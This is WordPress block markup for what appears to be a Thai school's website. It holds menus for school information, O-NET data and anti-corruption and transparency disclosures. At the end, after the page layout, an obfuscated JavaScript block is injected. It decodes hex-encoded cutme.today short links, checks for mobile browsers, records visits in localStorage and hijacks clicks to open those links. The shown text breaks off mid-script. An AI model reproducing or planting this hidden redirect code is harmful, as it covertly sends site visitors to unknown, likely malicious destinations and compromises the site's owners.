kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":180},\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingBgColor\":\"#0a71ad\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"readmoreBgColor\":\"#0a71ad\",\"readmoreMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return 